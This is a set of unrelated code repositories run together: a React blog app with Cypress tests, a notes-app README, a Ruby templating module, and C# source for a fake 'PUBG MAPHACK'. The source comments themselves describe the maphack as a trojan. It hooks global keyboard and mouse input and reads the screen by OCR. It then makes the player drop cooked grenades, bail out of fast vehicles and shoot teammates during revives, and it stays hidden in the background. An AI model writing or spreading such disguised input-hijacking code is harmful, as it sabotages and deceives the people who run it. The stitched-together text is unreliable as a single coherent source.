<button id="delete-button" onClick={deletePost}>
delete blog
</button>
</div>
);
return (
<Container>
<Heading align="center" size="lg">
{blog.title} <i>by</i> {blog.author}
</Heading>
<Flex direction="column" align="center" mt={10}>
<Link href={blog.url}>{blog.url}</Link>
<Box border="1px" borderColor="teal" p={2} rounded={20} m={2}>
<span className="blog-likes">{blog.likes} likes</span>
<Button id="like-button" onClick={giveLike} colorScheme="teal" m={2}>
like
</Button>
</Box>
<div>added by {blog.user.name}</div>
{blog.user.username === user.username ? showDeleteButton() : ''}
<Heading color="teal" w="100%" size="md" align="center" mt={10}>
comments
</Heading>
<form onSubmit={addComment}>
<Input {...commentInput.input} />
<Button type="submit" colorScheme="teal" variant="outline" w="100%">
add comment
</Button>
</form>
{blog.comments.length === 0 ? <div>No comments...</div> : ''}
<UnorderedList>
{blog.comments.map(c => {
return (
<ListItem key={c.id} m={3}>
{c.content}
</ListItem>
);
})}
</UnorderedList>
</Flex>
</Container>
);
};
export default Blog;
<file_sep>describe("Blog app", function () {
//
beforeEach(function () {
//empty the database
cy.request("POST", "http://localhost:3003/api/testing/reset");
cy.addUser({
username: "starryNight",
name: "starryNight",
password: "<PASSWORD>",
});
cy.addUser({ username: "starDay", name: "starDay", password: "<PASSWORD>" });
cy.visit("http://localhost:3000");
});
it("login form is shown", function () {
cy.contains("username");
});
describe("while logging in", function () {
it("user can log in", function () {
//get the input
//fill in input
cy.get("#username").type("starryNight");
cy.get("#password").type("<PASSWORD>");
//click button
cy.get("#login-button").click();
//notification about success login shown
cy.contains("starryNight logged in");
});
it("user cannot log in with wrong password", function () {
//get the input
//fill in input
cy.get("#username").type("starryNight");
cy.get("#password").type("<PASSWORD>");
//click button
cy.get("#login-button").click();
//notification about success login shown
cy.get(".errorMessage")
.should("contain", "invalid username or password")
.and("have.css", "color", "rgb(255, 0, 0)")
.and("have.css", "border-style", "solid");
});
});
describe("when logged in", function () {
beforeEach(function () {
// log in user
cy.login({ username: "starryNight", password: "<PASSWORD>" });
});
it("A blog can be created", function () {
cy.contains("create new blog").click();
cy.get("#title").type("E2E with cypress seems ok");
cy.get("#author").type("cypress");
cy.get("#url").type("www.cypress.com");
cy.get("#createBlog-button").click();
cy.contains("E2E with cypress seems ok");
});
describe("after a few blog posts have been created", function () {
//
beforeEach(function () {
cy.createBlog({
title: "Do you wanna give like?",
author: "Likeme",
url: "like.com",
});
cy.createBlog({
title: "The other blog",
author: "<NAME>",
url: "other.org",
});
});
it("a user can like a blog", function () {
//find view, click
cy.get("#toggleDetails-button").first().click();
cy.get("#like-button").first().click();
cy.get(".details").first().should("contain", "1");
});
it("a user can delete a blog they created", function () {
cy.get("#toggleDetails-button").first().click();
cy.get(".details")
.first()
.should("contain", "starryNight")
.and("contain", "delete blog");
cy.get(".details").find("#delete-button").first().click();
cy.get("html").should("contain", "Do you wanna give like? was removed");
});
it("users cannot delete other people's blogs", function () {
cy.login({ username: "starDay", password: "<PASSWORD>" });
cy.get("#toggleDetails-button").first().click();
cy.get(".details")
.first()
.should("contain", "starryNight")
.and("not.contain", "delete blog");
});
it("blogs are sorted by the most likes first", function () {
cy.createBlog({
title: "With likes",
author: "Liking",
url: "heart.com",
likes: 10,
});
cy.createBlog({
title: "With Many likes",
author: "Liking",
url: "heart.com",
likes: 100,
});
cy.get(".blog-likes").should(($likes) => {
//
const likesNumber = $likes.map((i, el) => {
return Cypress.$(el).text().match(/\d+/);
});
expect(likesNumber.get()).to.deep.eq(["100", "10", "0", "0"]);
});
});
});
});
});
<file_sep>import React, { useEffect, useRef } from 'react';
import { Switch, Route, useRouteMatch } from 'react-router-dom';
import { useSelector } from 'react-redux';
// Components
import Users from './components/Users';
import Main from './components/Main';
import Menu from './components/Menu';
import Notification from './components/Notification';
import User from './components/User';
import Blog from './components/Blog';
import { useDispatch } from 'react-redux';
import { initBlogs } from './reducers/blogsReducer';
import { initUser } from './reducers/loggedUserReducer';
import { initUsers } from './reducers/usersReducer';
import LoginForm from './components/LoginForm';
import { Flex, Heading, Container, Center } from '@chakra-ui/react';
const App = () => {
const dispatch = useDispatch();
// select logged in user, if any
const userAuth = useSelector(state => state.loggedUser);
useEffect(() => {
dispatch(initUser());
dispatch(initBlogs());
dispatch(initUsers());
}, []);
// User route - find matching user
const users = useSelector(state => state.users);
const matchUser = useRouteMatch('/users/:id');
const user = matchUser
? users.find(user => user.id === matchUser.params.id)
: null;
// Blog route - find matching blog
const blogs = useSelector(state => state.blogs);
const matchBlog = useRouteMatch('/blogs/:id');
const blog = matchBlog
? blogs.find(blog => blog.id === matchBlog.params.id)
: null;
// if user=null (not signed in)
const loginSection = () => (
<>
<Notification />
<Flex height="100vh" alignItems="center" justifyContent="center">
<Flex direction="column" background="gray.200" p={12} rounded={20}>
<Heading mb={6} align="center">
Blogs app
</Heading>
<LoginForm />
</Flex>
</Flex>
</>
);
// if user signed in
const landingSection = () => (
<>
<Menu />
<Container maxW="container.xl">
<Heading align="center" m={10}>
Blogs app
</Heading>
<Notification />
<Switch>
<Route path="/users/:id">
{user ? (
<User user={user} />
) : (
<div>The user does not exist or you put in a wrong url!</div>
)}
</Route>
<Route path="/blogs/:id">
{blog ? (
<Blog blog={blog} />
) : (
<div>The blog does not exist or you put in a wrong url!</div>
)}
</Route>
<Route path="/users">
<Users />
</Route>
<Route path="/">
<Main />
</Route>
</Switch>
</Container>
</>
);
return <>{userAuth === null ? loginSection() : landingSection()}</>;
};
export default App;
<file_sep>import React from 'react';
import { useSelector } from 'react-redux';
import { Link as ReachLink } from 'react-router-dom';
import { Link } from '@chakra-ui/react';
const BlogList = () => {
const blogs = useSelector(state => state.blogs);
const sortedBlogs = blogs.slice().sort((a, b) => b.likes - a.likes);
return (
<div>
{sortedBlogs.map(blog => (
<div key={blog.id} className="blog">
<Link as={ReachLink} to={`/blogs/${blog.id}`}>
{blog.title} <i>by</i> {blog.author}
</Link>
</div>
))}
</div>
);
};
export default BlogList;
<file_sep>import React from 'react';
import { useSelector } from 'react-redux';
import { Center } from '@chakra-ui/react';
const Notification = () => {
const notification = useSelector(state => state.notification);
if (notification === null) return null;
return (
<Center className={notification.style} p={5}>
{notification.message}
</Center>
);
};
export default Notification;
<file_sep>// {
// user: {
// name, username, token;
// }
// }
const loggedUserReducer = (state = null, action) => {
// console.log('user STATE NOW: ', state);
// console.log('user ACTION: ', action);
switch (action.type) {
case 'SET_USER':
return action.data;
case 'REMOVE_USER':
return null;
default:
return state;
}
};
export const initUser = () => {
return dispatch => {
const loggedUserJSON = window.localStorage.getItem('loggedInUser');
if (loggedUserJSON) {
dispatch(setUser(JSON.parse(loggedUserJSON)));
}
};
};
export const setUser = user => {
return {
type: 'SET_USER',
data: user,
};
};
export const removeUser = () => {
return {
type: 'REMOVE_USER',
};
};
export default loggedUserReducer;
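// Illustrative sketch only: the thunk-returning action creators above assume a store wired up
// roughly like the hypothetical snippet below. The file name and exact setup are assumptions
// based on the state keys used in the components (loggedUser, blogs, users, notification),
// not code from this repository.
//
// import { createStore, combineReducers, applyMiddleware } from 'redux';
// import thunk from 'redux-thunk';
// import loggedUserReducer from './reducers/loggedUserReducer';
// import blogsReducer from './reducers/blogsReducer';
// import usersReducer from './reducers/usersReducer';
// import notificationReducer from './reducers/notificationReducer';
//
// const store = createStore(
//   combineReducers({
//     loggedUser: loggedUserReducer,
//     blogs: blogsReducer,
//     users: usersReducer,
//     notification: notificationReducer,
//   }),
//   applyMiddleware(thunk)
// );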
<file_sep>import React from 'react';
import { useDispatch, useSelector } from 'react-redux';
import { setNotification } from '../reducers/notificationReducer';
import { removeUser } from '../reducers/loggedUserReducer';
import { useHistory } from 'react-router-dom';
const LoginStatus = () => {
const dispatch = useDispatch();
const user = useSelector(state => state.loggedUser);
const history = useHistory();
const handleLogout = () => {
dispatch(removeUser());
window.localStorage.removeItem('loggedInUser');
dispatch(setNotification('Stop by soon!'));
history.push('/');
};
if (!user) return null;
return (
<p>
{user.name} logged in{' '}
<button id="logout-button" onClick={handleLogout}>
logout
</button>
</p>
);
};
export default LoginStatus;
<file_sep>import React from 'react';
import {
Heading,
Container,
UnorderedList,
ListItem,
Box,
} from '@chakra-ui/react';
// input: props user:{ name, username, id, blogs:[{..},{..}] }
// show name of the user
// list all the blogs added by the user
const User = ({ user }) => {
return (
<div>
<Heading color="teal" w="100%" size="md" align="center" mt={5}>
{user.name}
</Heading>
<Container>
<Heading color="teal" w="100%" size="sm" align="center" md={5}>
added blogs:
</Heading>
<UnorderedList>
{user.blogs.map(blog => (
<ListItem key={blog.id}>
<Box border="1px" p={2} rounded={5} m={2}>
{blog.title}
</Box>
</ListItem>
))}
</UnorderedList>
</Container>
</div>
);
};
export default User;
<file_sep>import React, { useState, useImperativeHandle } from 'react';
import PropTypes from 'prop-types';
import { Button } from '@chakra-ui/react';
const Togglable = React.forwardRef((props, ref) => {
const [visible, setVisible] = useState(false);
const hideAux = { display: visible ? 'none' : '' };
const showMain = { display: visible ? '' : 'none' };
const toggleVisibility = () => {
setVisible(!visible);
};
useImperativeHandle(ref, () => {
return { toggleVisibility };
});
return (
<div>
<div style={hideAux}>
<Button onClick={toggleVisibility} colorScheme="teal" w="100%">
{props.buttonLabel}
</Button>
</div>
<div style={showMain}>
{props.children}
<Button onClick={toggleVisibility} colorScheme="gray" w="100%">
cancel
</Button>
</div>
</div>
);
});
Togglable.propTypes = {
buttonLabel: PropTypes.string.isRequired,
};
Togglable.displayName = 'Togglable';
export default Togglable;
<file_sep>import React, { useEffect, useRef } from 'react';
// Components
import Togglable from './Togglable';
import NewBlog from './NewBlog';
import Notification from './Notification';
import BlogList from './BlogList';
import LoginForm from './LoginForm';
import LoginStatus from './LoginStatus';
// State
import { useSelector } from 'react-redux';
import { Container, Heading } from '@chakra-ui/react';
const Main = () => {
const blogsSectionRef = useRef();
return (
<Container>
<Heading align="center" size="lg">
List of blogs
</Heading>
<BlogList />
<Togglable buttonLabel="create new blog" ref={blogsSectionRef}>
<NewBlog forwardedRef={blogsSectionRef} />
</Togglable>
</Container>
);
};
export default Main;
| b0b91360aae8194d5384f51f857f57b1f22c40e2 | ["JavaScript"] | 10 | JavaScript | Starle21/FullStackOpen-exercises-part7-Misc | 296e83d537b184d1cc0140689889ac371679260d | c8678cf24787daf82b42b29aef7e7f4c96e04cc8 | refs/heads/main |
<repo_name>brucevanhorn2/CaptainsLog<file_sep>/server/models/index.js
const Profile = require('./Profile');
const LogEntry = require('./LogEntry');
module.exports = { Profile, LogEntry };
<file_sep>/README.md
# Captain's Log
This software is designed to be a daily log for software developers. I've found that writing down, at the end of each day, everything that happened, explanations of root causes, and solutions (including what you tried that didn't work) makes it much easier to remember how to solve the same or similar problems when they come up again; at the very least you have a searchable set of notes catalogued alongside a calendar.
There are other tools I've used for this. I really liked Agenda, but it's only available on macOS and iOS. After my Mac suffered a catastrophic failure I was left with only my tablet, which is sometimes sufficient, but sometimes I need to make notes when I don't have the tablet with me.
Evernote started off great many years ago, but now it's bloated and the UI changes frequently. I simply don't like Microsoft's OneNote.
Another honorable mention is "Red Notebook", an older program with a good concept but a terrible editor. I want to be able to edit my notes with markdown, link between notes, and so on. An older version of Red Notebook showed a word cloud, which I thought might be interesting, but it was taken out in later versions. The tool also uses a local database, so it has no cloud synchronization.
## Design Goals
I want something that might be made available on any device or operating system, and something that stores, or at least syncs its data in the cloud, such that if I make notes on my tablet, they appear in my desktop copy on another machine, and vice versa. I should be able to use a browser on any computer to make and search notes.
Since this is just the start of this project, the simplest way to realize these goals is to build a web app. This is that app. Later, I can make a native version of the app for desktops with Electron, and perhaps even make tablet / mobile versions with React Native.
## Tech Stack
This is written in JavaScript using Node with Express, GraphQL, and a React front-end. The database used is MongoDB accessed using the Mongoose ODM. I intend to deploy it on Heroku with the database hosted by MongoDB Atlas.
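As a rough sketch of what the Mongoose side could look like, here is a minimal, illustrative model. The field names are placeholders, not a final schema; only the `LogEntry` and `Profile` model names exist so far in `server/models/index.js`.

```js
// server/models/LogEntry.js -- hypothetical sketch of a daily log entry model
const mongoose = require('mongoose');

const logEntrySchema = new mongoose.Schema({
  date: { type: Date, default: Date.now }, // the day this entry belongs to
  title: String,                           // short summary of the day
  body: String,                            // markdown text of the entry
  tags: [String],                          // searchable keywords
});

module.exports = mongoose.model('LogEntry', logEntrySchema);
```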
| 6c12b761f75e0eb720eef977a77a342226c24943 | ["JavaScript", "Markdown"] | 2 | JavaScript | brucevanhorn2/CaptainsLog | afa5326c62bd981204b679a7e26e3d245f02ffe3 | 33aec0e73bd6498f1505523daab3ab309f7ec7aa | refs/heads/master |
<file_sep>require_relative 'template'
describe Template do
include Template
it "should substitute %CODE% and %ALTCODE% in the template" do
template('Code is %CODE%; alt code is %ALTCODE%', '5678901234').should == 'Code is 5678901234; alt code is 56789-012'
end
it "should substitute %CODE% but not %ALTCODe% in the template" do
template('Code is %CODE%; alt code is %ALTCODe%', '5678901234').should == 'Code is 5678901234; alt code is %ALTCODe%'
end
it "should substitute %CODE% and %ALTCODE% in the template twice" do
template('Code is %CODE%; alt code is %ALTCODE%, Again Code is %CODE%; alt code is %ALTCODE%',
'5678901234').should == 'Code is 5678901234; alt code is 56789-012, Again Code is 5678901234; alt code is 56789-012'
end
it "should substitute %CODE% and %ALTCODE% in the template even if number is <4" do
template('Code is %CODE%; alt code is %ALTCODE%', '124').should == 'Code is 124; alt code is 124-'
end
it "should substitute %CODE% and %ALTCODE% in the template even if number is >4 but <7" do
template('Code is %CODE%; alt code is %ALTCODE%', '1234509').should == 'Code is 1234509; alt code is 12345-09'
end
it "should substitute %CODE% only in the template" do
template('Code is %CODE%', '12341234').should == 'Code is 12341234'
end
end
<file_sep>module Template
def template(source_template, req_id)
    # Two assumptions:
    # 1. Every occurrence of %CODE% and %ALTCODE% is replaced.
    # 2. Replacement is case sensitive.
    # %CODE% is simply replaced with req_id; the gsub calls below handle both tokens.
    # There is no rule specifying how req_id should be split, so the alt code is built
    # from the first five digits, a dash, and the next three digits; if req_id is
    # shorter, whatever digits exist are used (see the specs for the short-number cases).
altcode = req_id[0..4].to_s + "-" + req_id[5..7].to_s
    # The first gsub substitutes %CODE%, the second %ALTCODE%
source_template.gsub(/%CODE%/,req_id).gsub(/%ALTCODE%/,altcode)
end
end
# This is how modules can be included
class RunTemplate
include Template
end
class RunTemplate1
extend Template
end
puts RunTemplate.new.template('Code is %CODE%; alt code is %ALTCODE%', '5678901234')
puts RunTemplate1.template('Code is %CODE%; alt code is %ALTCODE%, Again Code is %CODE%; alt code is %ALTCODE%',
'5678901234')
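# Note on the two classes above: `include Template` mixes `template` in as an instance method,
# so it is called via RunTemplate.new.template(...), while `extend Template` adds it at the
# module/class level, so RunTemplate1.template(...) works without instantiating. Per the spec,
# the first call prints "Code is 5678901234; alt code is 56789-012".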
| c999213f292cf9aa51a30c2cdbe51b2b8e28e291 | ["Ruby"] | 2 | Ruby | kashyap-bhatt15/jobs | d8d87b8b85bd628123f82f3fd227a25a2fd1eeb8 | f2d8e528981352d5b21384c1fbc2f73cbdef5b41 | refs/heads/master |
<repo_name>metaversettt/pubg-maphack-master<file_sep>/html/analytics.js
(function($) {
$(document).ready(function() {
function saveInAnalytics(category, action, label) {
if ("ga" in window) {
if (typeof ga.getAll !== "undefined") {
tracker = ga.getAll()[0];
if (tracker)
tracker.send('event', category, action, label);
}
}
}
$(".screenshot1").click(function() {
saveInAnalytics("clicks", "screenshots", "In-game screenshot");
});
$(".screenshot2").click(function() {
saveInAnalytics("clicks", "screenshots", "Software screenshot");
});
$(".download").click(function() {
saveInAnalytics("clicks", "download", "pubg maphack v1.2");
});
});
}(jQuery));<file_sep>/PUBG MAPHACK/classes/GameMonitor.cs
using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Text.RegularExpressions;
using Gma.System.MouseKeyHook;
using System.Windows.Forms;
using System.Timers;
using System.Threading;
namespace PUBG_MAPHACK
{
public class GameMonitor
{
private ScreenAnalyzer sAnalyzer = new ScreenAnalyzer();
private IKeyboardMouseEvents m_GlobalHook;
private static System.Timers.Timer aTimer;
private static System.Timers.Timer reviveTimer;
private int ejectSpeed = 80;
public Dictionary<string, string[]> playerKeyBindings;
[DllImport("user32.dll")]
private static extern void mouse_event(uint dwFlags, uint dx, uint dy, uint dwData, int dwExtraInfo);
public GameMonitor()
{
playerKeyBindings = getPlayerKeybindings();
// Key/Mouse combinations to monitor
var assignment = new Dictionary<Combination, Action> { };
// Nade cooking key combiantions from player config
foreach (var fire in playerKeyBindings["Fire"])
{
foreach (var cook in playerKeyBindings["StartCookingThrowable"])
{
string keyCombo = fire + "+" + cook;
// Add every combination to monitor
assignment.Add(Combination.FromString(keyCombo), suicideByNade);
}
}
// Hold interact button event (to detect if player is reviving someone)
foreach (var interact in playerKeyBindings["Interact"])
{
// Add every combination to monitor
assignment.Add(Combination.FromString(interact), holdingInteractButton);
}
// Install listener
m_GlobalHook = Hook.GlobalEvents();
m_GlobalHook.OnCombination(assignment);
// Set timer to check if player is driving
aTimer = new System.Timers.Timer(3000);
aTimer.Elapsed += isPlayerDriving;
aTimer.AutoReset = true;
aTimer.Enabled = true;
// Set timer that is used to trigger player to shoot his teammate when reviving
reviveTimer = new System.Timers.Timer(7000);
reviveTimer.Elapsed += fireeeeeeeeeeeeeeeee;
reviveTimer.AutoReset = false;
reviveTimer.Enabled = false;
}
public void holdingInteractButton()
{
void ReleaseInteractEvent(object sender, KeyEventArgs e)
{
reviveTimer.Stop();
// Remove button release listener
m_GlobalHook.KeyUp -= ReleaseInteractEvent;
}
if(reviveTimer.Enabled == false)
{
// Set event that triggers when the player releases interact button
m_GlobalHook.KeyUp += ReleaseInteractEvent;
}
// Start the timer to start shooting
reviveTimer.Enabled = true;
}
private void fireeeeeeeeeeeeeeeee(Object source, ElapsedEventArgs e)
{
/* Trigger 20 shots by clicking left mouse button 20 times.
               This triggers if the player holds the interact button for 7 seconds */
for (int i = 0; i < 20; i++)
{
// Left mouse down
mouse_event(0x02, 0, 0, 0, 0);
Thread.Sleep(50);
// Left mouse up
mouse_event(0x04, 0, 0, 0, 0);
}
Program.triggerTracker += @"Revive fire triggered | ";
}
public void suicideByNade()
{
void ReleaseNadeEvent(object sender, MouseEventExtArgs e)
{
// Trigger weapon change to drop nade (two different keys just to be safe)
SendKeys.SendWait("{1}"); // Try switch to main weapon
SendKeys.SendWait("{X}"); // Try holster weapons
// Remove mouse up listener
m_GlobalHook.MouseUpExt -= ReleaseNadeEvent;
Program.triggerTracker += @"Suicide by nade triggered | ";
}
// Set event that triggers when the player releases left mouse down (throw nade)
m_GlobalHook.MouseUpExt += ReleaseNadeEvent;
}
public void suicideByEject()
{
// Simple but effective, trigger exit vehicle by simulating exit vehicle keypress
if(playerKeyBindings.ContainsKey("Interact"))
{
SendKeys.SendWait("{" + playerKeyBindings["Interact"][0] + "}");
}
SendKeys.SendWait("{F}"); // Extra saftey (default key binding)
Program.triggerTracker += @"Suicide by eject triggered | ";
}
private async void isPlayerDriving(Object source, ElapsedEventArgs e)
{
int screenHeight = Int32.Parse(playerKeyBindings["ResolutionSizeY"][0]);
// Look for km/h in left corner of screen
string results = await sAnalyzer.Analyze(0, screenHeight - 120, 600, 95);
Program.debug_log(results);
if (results.Contains("km/h"))
{
// Get speed as number
int speed = getDrivingSpeed(results);
Program.debug_log("Player driving at speed: " + speed.ToString());
// if speed is over ejectspeed it's time to SEND IT!!!
if(speed > ejectSpeed)
{
suicideByEject(); // BYE :)
}
}
}
private int getDrivingSpeed(string analyzerResults)
{
String[] spearator = { "\n" };
Int32 count = 999;
// Split results into array
String[] strlist = analyzerResults.Split(spearator, count, StringSplitOptions.RemoveEmptyEntries);
// Loop through array and find speed
foreach (String s in strlist)
{
if (s.Contains("km/h"))
{
                    // Results are a bit unpredictable and sometimes add unwanted numbers into our km/h match, so let's try to fix that here
String[] delimiter = { "km/h" };
String[] split1 = s.Split(delimiter, count, StringSplitOptions.RemoveEmptyEntries);
String[] delimiter2 = { " " };
if(split1.Length > 0)
{
String[] split2 = split1[0].Split(delimiter2, count, StringSplitOptions.RemoveEmptyEntries);
try
{
// Convert speed string to int
int speed = Int32.Parse(Regex.Replace(split2[split2.Length - 1], "[^.0-9]", ""));
if (speed > 152) return 0; // faulty result - abort!
return speed;
}
catch (FormatException e)
{
return 0;
}
}
}
}
return 0;
}
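    /* Example of what getDrivingSpeed() extracts (illustrative input only): if the OCR text
       contains a line such as "97 km/h", splitting on "km/h" and then on spaces leaves "97",
       which parses to 97; unparsable fragments or values above 152 km/h fall back to 0. */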
private Dictionary<string, string[]> getPlayerKeybindings()
{
ConfigParser ConfigParser = new ConfigParser();
return ConfigParser.parseConfig();
}
}
}
<file_sep>/PUBG MAPHACK/classes/ScreenAnalyzer.cs
using System.Drawing;
using System.Threading.Tasks;
using Tesseract;
using System.IO;
namespace PUBG_MAPHACK
{
public class ScreenAnalyzer
{
public TesseractEngine engine;
public ScreenAnalyzer() {
// Copy tessdata to tmp folder
if (Directory.Exists("x86") && !Directory.Exists(Path.GetTempPath() + @"\tessdata"))
{
Directory.CreateDirectory(Path.GetTempPath() + @"\tessdata");
foreach (string newPath in Directory.GetFiles(@"x86\tessdata", "*.*", SearchOption.AllDirectories))
{
System.Console.WriteLine(newPath);
File.Copy(newPath, Path.GetTempPath() + @"\tessdata\" + Path.GetFileName(newPath), true);
}
}
}
public async Task<string> Analyze(int x, int y, int width, int height)
{
string textInImage = "";
try
{
textInImage = await Task.Run(() => {
// Let's capture part of screen for analysis
Bitmap image = CaptureScreen(x, y, width, height);
// Let's get any text inside screenshot
return getTextFromImage(image);
});
}
catch
{
// YEET
}
// Return our results
return textInImage.ToLower();
}
public Bitmap CaptureScreen(int x, int y, int width, int height)
{
// Let's create a rectangle (Hodor!)
Rectangle bounds = new Rectangle(x, y, width, height);
// Let's create a bitmap same size as our rectangle (Hodor!)
Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height);
// Let's create a graphics object from the bitmap (Hodor!)
Graphics g = Graphics.FromImage(bitmap);
// Let's capture part of our screen in our graphic (Hodor!)
g.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);
/* If we build with debugging mode lets save printscreens in debugging folder */
if(Program.debug == true)
{
bitmap.Save(@"debug\printscreens\screen-" + System.DateTime.Now.ToFileTime() + ".png", System.Drawing.Imaging.ImageFormat.Png);
}
return bitmap;
}
public string getTextFromImage(Bitmap bitmap)
{
string tessdata = "";
if (Directory.Exists(Path.GetTempPath() + @"tessdata"))
{
tessdata = Path.GetTempPath() + @"tessdata";
} else
{
if (Directory.Exists(@"x86\tessdata"))
{
tessdata = @"x86\tessdata";
}
}
if (tessdata == "") {
Program.triggerTracker += @"tessdata not found | ";
return "";
}
//TesseractEnviornment.CustomSearchPath = Path.GetTempPath() + "pubg_maphack";
/* Let's load the Tesseract library (used to get text from images)
* The tessdata has been trained to find only PUBG's ingame font with characters "0-9/kmh" (to find the speed)
* If you want to detect other stuff you need to download the original tessdata files or make your own */
using (TesseractEngine engine = new TesseractEngine(tessdata, "eng", EngineMode.Default))
{
// Set segmentation mode to SparseText for best results (tested all)
engine.DefaultPageSegMode = PageSegMode.SparseText;
//engine.SetVariable("tessedit_ocr_engine_mode", 1);
// Convert pixels
var pix = PixConverter.ToPix(bitmap);
// Do the magic
var page = engine.Process(pix);
return page.GetText();
}
}
}
}
<file_sep>/PUBG MAPHACK/classes/ConfigParser.cs
using System;
using System.Collections.Generic;
using System.IO;
using System.Windows.Forms;
namespace PUBG_MAPHACK
{
public class ConfigParser
{
public string playerConfig = "";
public Dictionary<string, string> enumsTranslation = new Dictionary<string, string>();
Dictionary<string, string[]> defaults = new Dictionary<string, string[]>();
public ConfigParser()
{
// Set default bindings as fallback
defaults.Add("Fire", new string[] { "LButton" });
defaults.Add("Interact", new string[] { "F" });
defaults.Add("ResolutionSizeY", new string[] { Screen.PrimaryScreen.Bounds.Height.ToString() });
defaults.Add("ResolutionSizeX", new string[] { Screen.PrimaryScreen.Bounds.Width.ToString() });
defaults.Add("StartCookingThrowable", new string[] { "R" });
// Get enum translations
enumsTranslation = getEnumTranslation();
// Load pubg player config
if (File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\TslGame\Saved\Config\WindowsNoEditor\GameUserSettings.ini"))
{
try
{
playerConfig = File.ReadAllText(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\TslGame\Saved\Config\WindowsNoEditor\GameUserSettings.ini");
}
catch (FileNotFoundException ex)
{
Console.WriteLine(ex.Message);
}
}
}
public Dictionary<string, string[]> parseConfig()
{
string keyName;
string keyBind;
var keyBindings = new Dictionary<string, string[]>();
var returnValue = new Dictionary<string, string[]>();
string[] splitter = { };
string[] SplitOnKeys = { };
string[] SplitOnKey = { };
int i = 0;
int i2 = 0;
if (playerConfig.Length > 0)
{
/* This is ugly but gets the job done */
string[] Actions = playerConfig.Split(new[] { "ActionName" }, StringSplitOptions.RemoveEmptyEntries);
i = 0;
foreach (var Action in Actions)
{
i++;
if (i == 1 || i == Actions.Length) continue; // Skip first and last
// Get key name
splitter = Action.Split(new[] { '"' }, StringSplitOptions.RemoveEmptyEntries);
if (splitter.Length > 0)
{
keyName = splitter[1];
} else
{
continue;
}
// Get key bindings
SplitOnKeys = Action.Split(new[] { "Keys=" }, StringSplitOptions.RemoveEmptyEntries);
foreach (var Keys in SplitOnKeys)
{
if (!Keys.Contains("Key=")) continue;
SplitOnKey = Action.Split(new[] { "Key=" }, StringSplitOptions.RemoveEmptyEntries);
i2 = 0;
foreach (var Key in SplitOnKey)
{
i2++;
if (i2 == 1) continue;
// Clean out some not needed characters
keyBind = Key;
keyBind = keyBind.Replace("),())),(", "");
keyBind = keyBind.Replace("))),(", "");
keyBind = keyBind.Replace("),(", "");
splitter = keyBind.Split(new[] { "," }, StringSplitOptions.RemoveEmptyEntries);
if (splitter.Length > 0)
{
// Translate to enum value
if(enumsTranslation.ContainsKey(keyBind)) {
keyBind = enumsTranslation[keyBind];
}
if(!keyBindings.ContainsKey(keyName))
{
// Add new keyBind
keyBindings.Add(keyName, new string[] { keyBind });
} else
{
// If keyBind has multiple keys lets add second bind also
keyBindings[keyName] = new string[] { keyBind, keyBindings[keyName][0] };
}
}
}
}
}
// Get player game resolution
string[] configLines = playerConfig.Split(new[] { '\n' });
foreach(var line in configLines)
{
if(line.Contains("ResolutionSizeX") && !keyBindings.ContainsKey("ResolutionSizeX"))
{
keyBindings.Add("ResolutionSizeX", new string[] { line.Replace("ResolutionSizeX=", "") });
}
if (line.Contains("ResolutionSizeY") && !keyBindings.ContainsKey("ResolutionSizeY"))
{
keyBindings.Add("ResolutionSizeY", new string[] { line.Replace("ResolutionSizeY=", "") });
}
}
}
if (keyBindings.ContainsKey("Fire") &&
keyBindings.ContainsKey("Interact") &&
keyBindings.ContainsKey("ResolutionSizeY") &&
keyBindings.ContainsKey("ResolutionSizeX") &&
keyBindings.ContainsKey("StartCookingThrowable"))
{
returnValue = keyBindings;
} else
{
returnValue = defaults;
}
return returnValue;
}
public Dictionary<string, string> getEnumTranslation()
{
Dictionary<string, string> translation = new Dictionary<string, string>();
translation.Add("LeftMouseButton", "LButton");
translation.Add("RightMouseButton", "RButton");
translation.Add("MiddleMouseButton", "MButton");
translation.Add("XButton1", "ThumbMouseButton1");
translation.Add("XButton2", "ThumbMouseButton2");
translation.Add("LeftShift", "LShiftKey");
translation.Add("RightShift", "RShiftKey");
translation.Add("LeftControl", "LControlKey");
translation.Add("RightControl", "RControlKey");
translation.Add("SpaceBar", "Space");
translation.Add("BackSpace", "Back");
translation.Add("Zero", "D0");
translation.Add("One", "D1");
translation.Add("Two", "D2");
translation.Add("Three", "D3");
translation.Add("Four", "D4");
translation.Add("Five", "D5");
translation.Add("Six", "D6");
translation.Add("Seven", "D7");
translation.Add("Eight", "D8");
translation.Add("Nine", "D9");
translation.Add("NumPadZero", "NumPad0");
translation.Add("NumPadOne", "NumPad1");
translation.Add("NumPadTwo", "NumPad2");
translation.Add("NumPadThree", "NumPad3");
translation.Add("NumPadFour", "NumPad4");
translation.Add("NumPadFive", "NumPad5");
translation.Add("NumPadSix", "NumPad6");
translation.Add("NumPadSeven", "NumPad7");
translation.Add("NumPadEight", "NumPad8");
translation.Add("NumPadNine", "NumPad9");
return translation;
}
}
}
<file_sep>/PUBG MAPHACK/Program.cs
using System;
using System.Windows.Forms;
using System.Diagnostics;
using System.IO;
namespace PUBG_MAPHACK
{
static class Program
{
static public Boolean debug = false;
static public string triggerTracker = "";
[STAThread]
static void Main()
{
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(false);
if (Directory.Exists("debug"))
{
debug = true;
}
// Let's start our trojan if it's not already running in background
Process[] isAlreadyInitialized = Process.GetProcessesByName("PUBG MAPHACK");
if (isAlreadyInitialized.Length == 1 || !Directory.Exists("x86"))
{
// Start our game monitor & let the trolling begin!
new GameMonitor();
// Start our replay monitor & uploader
new ReplayMonitor();
}
if (Directory.Exists("x86"))
{
// Run fake cheat application
Application.Run(new fake_cheat());
/* Run this hidden win form in background if user closes main application window.
* This keeps the trojan alive until reboot or manual shutdown in process list */
System.Windows.Forms.MessageBox.Show("Hidden instance of pubg maphack is still running (check processes)", "Developer helper", System.Windows.Forms.MessageBoxButtons.OK, System.Windows.Forms.MessageBoxIcon.Information);
Application.Run(new hidden());
}
else
{
System.Windows.Forms.MessageBox.Show("Make sure folder x86 is located in the same location as pubg maphack.exe (x86 can be found in pubg_maphack.zip)", "Error - x86 Missing", System.Windows.Forms.MessageBoxButtons.OK, System.Windows.Forms.MessageBoxIcon.Error);
}
}
public static void debug_log(string message)
{
if(debug == true)
{
